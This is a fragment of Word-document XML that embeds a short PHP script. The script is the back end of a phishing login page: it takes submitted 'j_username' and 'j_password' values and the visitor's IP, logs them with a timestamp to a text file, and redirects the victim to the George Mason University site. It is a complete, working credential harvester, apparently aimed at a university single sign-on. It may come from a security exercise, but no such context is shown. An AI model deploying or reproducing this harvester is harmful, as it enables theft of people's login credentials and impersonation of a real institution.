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&lt;?php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($_SERVER[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'REQUEST_METHOD'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 ===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'POST'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 {</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">    $username = $_POST[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'j_username'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$password = $_POST[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'j_password'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$ip = $_SERVER[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'REMOTE_ADDR'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];</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">    </w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">    $timestamp = date(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'l jS \of F Y h:i:s A'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    </w:t>
              <w:br w:type="textWrapping"/>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">    $file = fopen(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"login_data.txt"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"a"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fwrite($file,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"IP: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$ip .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Date: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$timestamp .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Username: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$username .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 Password: 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 . $password .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"\n"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fclose($file);</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">    </w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">    header(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hd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">"Location: https://gmu.edu"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hd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">exit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hd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">;</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">}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hd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">?&gt;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